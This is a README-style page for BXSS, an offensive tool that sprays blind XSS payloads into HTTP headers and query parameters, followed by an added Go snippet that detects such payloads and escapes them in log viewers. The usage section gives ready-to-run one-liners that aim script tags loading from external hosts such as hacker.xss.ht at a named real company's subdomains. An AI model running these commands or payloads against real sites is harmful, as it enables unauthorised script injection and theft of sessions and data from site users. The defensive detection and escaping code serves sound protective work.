BXSS : A Blind XSS Injector Tool

BXSS is a blind XSS injector tool.

Features

  • Inject Blind XSS payloads into custom headers
  • Inject Blind XSS payloads into parameters
  • Uses different request methods (PUT, POST, GET, OPTIONS) all at once
  • Tool Chaining
  • Really fast
  • Easy to set up

Install

$ go get -u github.com/ethicalhackingplayground/bxss

Arguments

— Coded by @z0idsec —
  -appendMode
        Append the payload to the parameter
  -concurrency int
        Set the concurrency (default 30)
  -header string
        Set the custom header (default "User-Agent")
  -parameters
        Test the parameters for blind XSS
  -payload string
        The blind XSS payload

  • Blind XSS In Parameters

$ subfinder uber.com | gau | grep "&" | bxss -appendMode -payload '"><script src=https://hacker.xss.ht></script>' -parameters

  • Blind XSS In X-Forwarded-For Header

$ subfinder uber.com | gau | bxss -payload '"><script src=https://z0id.xss.ht></script>' -header "X-Forwarded-For"
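
For the receiving side of the requests above, an added example (not part of BXSS or of the original page): it flags header and query-parameter values that carry an external script tag, and HTML-escapes such a value before an internal log viewer displays it. `SuspectFields`, `RenderCell` and the `collector.example` request are constructed for illustration.

```go
package main

import (
	"fmt"
	"html"
	"net/http"
	"net/url"
	"regexp"
	"sort"
	"strings"
)

// scriptSrc matches a <script ... src=> tag, the shape of the payloads above.
var scriptSrc = regexp.MustCompile(`(?i)<[ \t]*script[^>\n]*\bsrc[ \t]*=`)

func tainted(vals []string) bool {
	return scriptSrc.MatchString(strings.Join(vals, "\n"))
}

// SuspectFields (hypothetical helper) names each tainted header and parameter.
func SuspectFields(rawURL string, h http.Header) []string {
	var hits []string
	for name, vals := range h {
		if tainted(vals) {
			hits = append(hits, "header:"+name)
		}
	}
	if u, err := url.Parse(rawURL); err == nil {
		for name, vals := range u.Query() { // Query() percent-decodes values
			if tainted(vals) {
				hits = append(hits, "param:"+name)
			}
		}
	}
	sort.Strings(hits)
	return hits
}

// RenderCell (hypothetical) escapes a logged value so it displays as text.
func RenderCell(v string) string { return "<td>" + html.EscapeString(v) + "</td>" }

func main() {
	// Constructed sample request, not captured traffic.
	probe := `"><script src=https://collector.example/x.js></script>`
	h := http.Header{"X-Forwarded-For": {probe}, "User-Agent": {"Mozilla/5.0"}}
	target := "/search?page=2&q=shoes" + url.QueryEscape(probe)
	fmt.Println(SuspectFields(target, h))
	fmt.Println(RenderCell(probe))
}
```

The check ignores the HTTP method, since the same value can arrive over PUT, POST, GET or OPTIONS. Escaping at render time is the control that matters; the pattern match only helps triage what was received.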

R K
